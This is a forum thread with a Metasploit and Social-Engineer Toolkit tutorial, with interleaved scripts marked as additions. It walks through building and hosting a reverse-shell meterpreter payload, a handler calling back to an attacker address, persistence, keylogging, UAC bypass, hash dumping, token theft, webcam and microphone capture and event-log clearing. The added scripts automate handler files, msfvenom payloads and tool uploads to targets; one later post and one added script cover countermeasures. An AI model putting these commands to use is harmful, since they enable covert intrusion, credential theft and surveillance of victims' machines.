MSF SETOOLKIT PARROT OS PENTESTING CODE & EXAMPLES


Post by jamied_uk on 14th May 2017, 00:25






Code examples should be used only within the scope of your local laws!
I accept no responsibility for your actions! Please be ethical!

1st
Update & Upgrade (then reboot):


Code:
sudo apt update && sudo apt upgrade -y



Code:
sudo apt-get --force-yes install -y git apache2 python-requests python-pymssql build-essential python-pexpect python-pefile python-crypto python-openssl





2nd

Install setoolkit:

Go into the folder where you want setoolkit to be, then:

Code:
git clone https://github.com/trustedsec/social-engineer-toolkit.git



Change your network settings so you have access from 10.0.0.0 to 192.168.0.0, for example!

Now to run...

Code:
# inside the cloned social-engineer-toolkit folder (an apt-installed SET is started with plain "sudo setoolkit")
sudo ./setoolkit


Now select options in this order:



1, 4, 2

Put your external or internal IP depending on how far a reach you want (a remote IP requires port forwarding to port 5555).

You should be able to use hostnames / domain names as well as IPs.

For example: jnet.sytes.net

Now you can move the payload (before you close setoolkit).



Move Payloads:

(Parrot OS)

Code:
sudo mv /root/.set/payload.exe /home/USERNAME/scripts/payloads
sudo cp /home/USERNAME/scripts/payloads/payload.exe /var/www/html

(Kali)


Code:
sudo mv /root/.set/payload.exe /root/Documents/Scripts/MSF/payloads
sudo cp /root/Documents/Scripts/MSF/payloads/payload.exe /var/www/html





Start your apache2 web server if required!

Code:
sudo service apache2 start

Now you can access it via your IP: http://your-ip-here

Now, if you wish to make things faster, you can create a file called Listener.sh. Here is the content of this file (used later):
Code:
#!/bin/bash
# Usage ./Listener.sh
# starts msfconsole and runs the handler resource file (meterpreter.rc must be in the current directory)
sudo msfconsole -r meterpreter.rc

As you can see it uses the .rc file, so here's the content of that file:


Code:
# handler for the SET payload: LHOST/LPORT must match what was given to SET
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.0.101
set LPORT 5555
# keep the handler listening after the first session connects
set ExitOnSession false
# run as a background job without interacting
exploit -j -z
help




Ok lets continue on!


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

(you have to be in a session for upload and execution)!

Upload script txt file

Example:

(Parrot OS)

Code:
upload /home/USERNAME/scripts/MSF/update/script.txt c:\\Users\\Test\\Desktop


(Kali)

Code:
upload /root/Documents/Scripts/MSF/update/script.txt c:\\Users\\Test\\Desktop




Run script.txt (from a relative path):

Code:
resource update/script.txt



So if you start from a random path you will need the full path. Example:

Code:
resource /root/Documents/Scripts/MSF/update/script.txt



(so the file can be on the linux side only and still work on remote system without needing to upload)!
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~



After you have got a target you need to make it persistent! (@ logon)

Code:
# -U run at user logon, -i retry interval in seconds, -p/-r handler port/host
run persistence -U -i 5 -p 5555 -r 192.168.0.101


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Dealing with sessions:



Code:
sessions -l          # lists all sessions
sessions -i (id)     # interact with this session
sessions -k (id)     # kills the session with that id


 

After you have joined a session you can add persistence! (Do this before all else!)


Now you can migrate.


Type in an active session:


Code:
ps



to list processes, then migrate to the PID of explorer.exe:


Code:
migrate 437



~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

When you migrate to explorer.exe you can run the key logger:


Code:
# "use sniffer" loads the packet-sniffer extension; the keyscan_* commands are stdapi and work without it
use sniffer
keyscan_start
keyscan_dump
keyscan_stop



You can use connect commands too:



Code:
# inside msfconsole: connect [options] <host> <port> (-S and -P set the source address/port, not the target)
connect 192.168.0.15 5555



Here are more random commands you can now go and learn about!

Enable RDP:
Code:
run getgui -e



Create a new username after you have escalated privs:


Code:
run getgui -u username -p password





Code:
execute -h





Code:
# run a hidden cmd.exe that removes the user again (the -a argument string must be quoted)
execute -H -f cmd.exe -a "/c net user username /delete"



Code:
getprivs
use priv




POST commands!
~~~~~~~~~~~~~~

Code:
run post/windows/gather/win_privs
search uac




Use the bypass UAC option after the last command!


Code:
# typed at the msf prompt (background the meterpreter session first)
use exploit/windows/local/bypassuac
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.1.10
set LPORT 8887
sessions -l
set SESSION 1
exploit
background
sessions -l
sessions -i 2
migrate (pid of explorer.exe)




Code:
run post/windows/gather/hashdump



Use John the Ripper to find the password from the hash!


Code:
# from the msf prompt, not inside meterpreter: cracks the hashes that hashdump stored in the database (may not be needed)
use auxiliary/analyze/jtr_crack_fast
run



resource text.txt   (a .txt file, stored for example at /usr/share/setfile.txt, that holds the commands)



Code:
cmd
netstat
ipconfig






Code:
resource /folder/file.txt

   (Linux location, not Windows: it is run on Windows but held on Linux)!





~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

show current directory



Code:
getwd


Show Linux directory:

Code:
lpwd





~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~


forward to a diff port:

Code:
portfwd




see route:


Code:
route





Token stealing:


Code:
steal_token (PID)




Code:
idletime









~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Code:
screenshot
webcam_list
webcam_stream -h
webcam_chat
record_mic -h
clearv

(when finished)


More info can be found @

https://www.youtube.com/watch?v=BDBUG75529M&list=PLnjNR4-S-EVqfJWovxEJyb7I0IOkKkoYM&index=74

https://www.youtube.com/watch?v=IvfJgwwq9Xs&index=63&list=PLnjNR4-S-EVqfJWovxEJyb7I0IOkKkoYM

https://www.youtube.com/watch?v=biMkKqWMC5Y&index=58&list=PLnjNR4-S-EVqfJWovxEJyb7I0IOkKkoYM

https://github.com/trustedsec/social-engineer-toolkit


For more MSF exploits

exploit-db.com/remote


More random commands:


Code:
use -l




Code:
sysinfo

   < to find username and os etc!




Code:
# rdesktop needs the target host as its last argument (target-ip is a placeholder)
rdesktop -u username -p password target-ip





Code:
lpwd

< Linux current directory (msf)

Get Resource Hacker to change the icon of the exploit or add a binary to it!



kill a msf session

Code:
sessions -k (id)

Now look into msfvenom, you can make payloads with this as well!


Last edited by jamied_uk on 15th May 2017, 13:48; edited 8 times in total
jamied_uk
Admin

Posts : 2260
Join date : 2010-05-09
Age : 34
Location : UK

http://address-shortner.co.uk
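Added example, not part of jamied_uk's post: a small shell script that writes the meterpreter.rc and Listener.sh files described above from one LHOST/LPORT pair, checks that the host and port are sane first, and prints the msfvenom command that builds a matching windows/meterpreter/reverse_tcp payload (msfvenom is only mentioned at the end of the post; the command line here is the standard one, given as an assumption about how you would build the same payload outside SET). Function names and the --demo flag are this example's own.

```shell
#!/bin/sh
# Added example (not from the original post). Generates meterpreter.rc and
# Listener.sh from one LHOST/LPORT pair so the handler always matches the
# payload, and prints the msfvenom command that builds that payload.
# Function names and the --demo flag are this example's own.
set -eu

# Accept a dotted-quad IPv4 address (octets 0-255) or a hostname such as
# the post's jnet.sytes.net.
valid_host() {
    if printf '%s\n' "$1" | grep -Eq '^[0-9]{1,3}(\.[0-9]{1,3}){3}$'; then
        for o in $(printf '%s\n' "$1" | tr . ' '); do
            [ "$o" -le 255 ] || return 1
        done
        return 0
    fi
    printf '%s\n' "$1" | grep -Eq '^[A-Za-z0-9]([A-Za-z0-9-]*[A-Za-z0-9])?(\.[A-Za-z0-9]([A-Za-z0-9-]*[A-Za-z0-9])?)*$'
}

# Accept a TCP port in the range 1-65535.
valid_port() {
    case "$1" in ''|*[!0-9]*) return 1 ;; esac
    [ "$1" -ge 1 ] && [ "$1" -le 65535 ]
}

# Write the handler resource file: the same lines as the post, parameterised.
write_handler_rc() {
    lhost="$1"; lport="$2"; out="$3"
    valid_host "$lhost" || { echo "bad LHOST: $lhost" >&2; return 1; }
    valid_port "$lport" || { echo "bad LPORT: $lport" >&2; return 1; }
    cat > "$out" <<EOF
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST $lhost
set LPORT $lport
set ExitOnSession false
exploit -j -z
EOF
}

# Write Listener.sh with an absolute path to the rc file, so it works from
# any directory (the post's version needs meterpreter.rc in the cwd).
write_listener() {
    rc="$1"; out="$2"
    cat > "$out" <<EOF
#!/bin/bash
# Usage: ./$(basename "$out")
sudo msfconsole -r "$rc"
EOF
    chmod +x "$out"
}

# The msfvenom command that builds a payload for exactly this handler.
venom_cmd() {
    printf 'msfvenom -p windows/meterpreter/reverse_tcp LHOST=%s LPORT=%s -f exe -o %s\n' \
        "$1" "$2" "${3:-payload.exe}"
}

if [ "${1:-}" = "--demo" ]; then
    dir=$(mktemp -d)
    write_handler_rc 192.168.0.101 5555 "$dir/meterpreter.rc"
    write_listener "$dir/meterpreter.rc" "$dir/Listener.sh"
    cat "$dir/meterpreter.rc"
    venom_cmd 192.168.0.101 5555 "$dir/payload.exe"
fi
```

Run it with --demo to see the generated rc file and the msfvenom line; the point of driving both from one pair of values is that a payload built for one LHOST/LPORT and a handler listening on another is the most common reason a session never arrives.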

Re: MSF SETOOLKIT PARROT OS PENTESTING CODE & EXAMPLES

Post by jamied_uk on 14th May 2017, 01:03

Countermeasures:


To find if you have any persistent things running on your system, open Task Manager.

Look for randomly named executables (close them if you know they are not legit).

After a few seconds it may come back, so do this...

Press host key + R to open the Run dialogue box.

Type

Code:
msconfig


Go to Startup

and look for suspicious files running from your temp directory; deselect these, save, exit, restart and re-check again. Also look in your startup locations (on the Start menu), and for Linux OS run

top, look for anything you think shouldn't be running and Google it; remove if required!

Now upgrade your anti-malware, anti-virus and anti-spyware, and update Windows through its update service.


Block all ports and apps on your router that you don't use and re-enable them if you do in the future!

Get a hardware firewall like Cisco or another good managed switch so that you can only allow the traffic you wish to!

Now it is a good idea to look into IDS; Intrusion Detection Systems are good!!!


Reply with your comments!
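Added example, not part of jamied_uk's post: the Linux-side version of the advice above (look for executables running from the temp directory, check the startup locations). The directory list, the function names and the sample process table are this example's own; with --live it reads the real process list from /proc instead of the constructed sample.

```shell
#!/bin/sh
# Added example (not from the original post): the Linux-side version of the
# post's advice to look for executables running from the temp directory and
# to check the startup locations. Function names, the directory list and the
# sample process table are this example's own.
set -eu

# Scratch directories a legitimate daemon binary has no business living in.
SUSPECT_DIRS="/tmp /var/tmp /dev/shm"

# Input on stdin: lines of "PID<TAB>EXE_PATH". Output: "PID EXE_PATH" for
# every process whose binary sits under one of SUSPECT_DIRS.
flag_temp_procs() {
    tab=$(printf '\t')
    while IFS="$tab" read -r pid exe; do
        [ -n "$exe" ] || continue
        for d in $SUSPECT_DIRS; do
            case "$exe" in
                "$d"/*) printf '%s %s\n' "$pid" "$exe"; break ;;
            esac
        done
    done
}

# Build that table from the real process list (root sees every process;
# a path ending in " (deleted)" means the binary was removed after launch,
# which is worth a look by itself).
scan_live() {
    for p in /proc/[0-9]*; do
        exe=$(readlink "$p/exe" 2>/dev/null) || continue
        printf '%s\t%s\n' "${p#/proc/}" "$exe"
    done
}

# The Linux counterpart of the post's msconfig > Startup check: print the
# files that run something at boot or logon.
list_startup_entries() {
    for f in /etc/rc.local /etc/cron.d/* /var/spool/cron/crontabs/* \
             /etc/xdg/autostart/*.desktop "${HOME:-/root}"/.config/autostart/*.desktop; do
        if [ -e "$f" ]; then printf '%s\n' "$f"; fi
    done
    crontab -l 2>/dev/null || true
}

# Constructed sample table for running the check offline.
SAMPLE_TABLE=$(printf '1\t/usr/lib/systemd/systemd\n612\t/usr/sbin/sshd\n1337\t/tmp/.x/update.exe\n1402\t/var/tmp/payload\n1500\t/usr/bin/top')

if [ "${1:-}" = "--live" ]; then
    scan_live | flag_temp_procs
    list_startup_entries
else
    printf '%s\n' "$SAMPLE_TABLE" | flag_temp_procs
fi
```

Against the constructed table the check reports PIDs 1337 and 1402 only; the match is on the directory prefix, so /tmpfoo/x is not flagged but /dev/shm/.s (deleted) is, since a binary that unlinked itself after starting is exactly what you want to look at.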

Re: MSF SETOOLKIT PARROT OS PENTESTING CODE & EXAMPLES

Post by jamied_uk on 19th May 2017, 15:25

MSF Cheat Sheet

latesthackingnews.com/2015/09/07/metasploit-cheat-sheet-free-download

Re: MSF SETOOLKIT PARROT OS PENTESTING CODE & EXAMPLES

Post by jamied_uk on 3rd June 2017, 16:40

Unzipping Files Remotely MSF



Extra Content




I used my new Quick Reference Notes

jnet.sytes.net

Code:
sudo service apache2 start




Move Payloads:

Code:
sudo mv /root/.set/payload.exe /home/jay/MSF/payloads

sudo cp /home/jay/MSF/payloads/payload.exe /var/www/html





Code:
sessions -i 1





Persistence:

Code:
run persistence -U -i 5 -p 5555 -r domain.name.com








Code:
use sniffer
keyscan_start
keyscan_dump
keyscan_stop





~~~~~~~~~~~~~~~~~~
1st, move into the relative path:
Code:
lcd /home/jay/MSF/

# destination paths use doubled backslashes; with no destination the file lands in the current remote directory
upload payload.exe "C:\\payload.exe"
upload update/netcat.zip "C:\\Backup\\netcat.zip"
upload update/netcat.zip "C:\\Users\\Test\\My Documents\\netcat.zip"
upload update/netcat.zip
upload update/7z.exe "C:\\Backup\\7z.exe"
upload update/script.txt "C:\\script.txt"
upload update/7z.exe "7z.exe"
upload update/7z.dll "7z.dll"





then type

Code:
shell



(in the correct location on the Windows side) unzip:


Code:
7z x *.zip -o*



More On
superuser.com/questions/95902/7-zip-and-unzipping-from-command-line




Use Resources:

Code:
resource update/script.txt


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Code:
meterpreter> use priv
meterpreter> hashdump
meterpreter> cd \\
meterpreter> resource script.txt
meterpreter> cd c:\\Users\\test\\Desktop\\
meterpreter> run winenum


https://www.offensive-security.com/metasploit-unleashed/existing-scripts/


Last edited by jamied_uk on 3rd June 2017, 18:41; edited 5 times in total
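Added example, not part of jamied_uk's posts: a shell script that generates a meterpreter resource script for the upload-and-unzip procedure in this post (and the earlier "Upload script txt file" section). It uploads every file in a local folder (7z.exe, 7z.dll and the archive) to a Windows folder and then runs the uploaded 7z.exe through execute, applying the doubled-backslash convention the working upload lines use to every Windows path, which is the detail the triple-backslash and mixed-slash lines in the post get wrong. Function names are this example's own; the execute/-a usage follows the form the first post uses for cmd.exe.

```shell
#!/bin/sh
# Added example (not from the original post): generate a meterpreter
# resource script that uploads every file in a local folder (7z.exe, 7z.dll,
# the archive) to a Windows folder and unpacks the archive there, with the
# Windows paths escaped the way the post's working upload lines escape them
# (every backslash doubled). Function names are this example's own.
set -eu

# Normalise a Windows path for a meterpreter command line: forward slashes
# become backslashes, runs of backslashes collapse to one, then every
# backslash is doubled. 'C:\\\Backup\x' and 'C:/Backup/x' both come out as
# C:\\Backup\\x.
win_path() {
    printf '%s\n' "$1" | sed -e 's#/#\\#g' -e 's#\\\\*#\\#g' -e 's#\\#\\\\#g'
}

# Emit "lcd" plus one "upload" line per regular file in LOCALDIR, each
# going to REMOTEDIR on the target.
gen_upload_rc() {
    localdir="$1"; remotedir="$2"
    printf 'lcd %s\n' "$localdir"
    for f in "$localdir"/*; do
        [ -f "$f" ] || continue
        name=$(basename "$f")
        printf 'upload "%s" "%s"\n' "$name" "$(win_path "$remotedir/$name")"
    done
}

# Emit the commands that unpack ARCHIVE with the uploaded 7z.exe in
# REMOTEDIR (7z x = extract with paths, -o = output folder, -y = assume yes;
# execute -H hides the window) and then list the folder to confirm.
gen_extract_rc() {
    remotedir="$1"; archive="$2"
    printf 'execute -H -f "%s" -a "x %s -o%s -y"\n' \
        "$(win_path "$remotedir/7z.exe")" "$(win_path "$remotedir/$archive")" "$(win_path "$remotedir")"
    printf 'ls "%s"\n' "$(win_path "$remotedir")"
}

# Usage: ./gen_upload.sh /home/jay/MSF/update 'C:\Backup' netcat.zip > upload.rc
# then, inside the session: resource /path/to/upload.rc
if [ $# -eq 3 ]; then
    gen_upload_rc "$1" "$2"
    gen_extract_rc "$2" "$3"
fi
```

The generated file is run from the session with resource, so the local folder only ever needs to hold 7z.exe, 7z.dll and the archive; nothing about the Windows path has to be typed by hand, which is where the stray backslashes came from.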

Re: MSF SETOOLKIT PARROT OS PENTESTING CODE & EXAMPLES

Post by jamied_uk on 3rd June 2017, 16:40

Check Out

youtube.com/user/Jamieduk999/videos
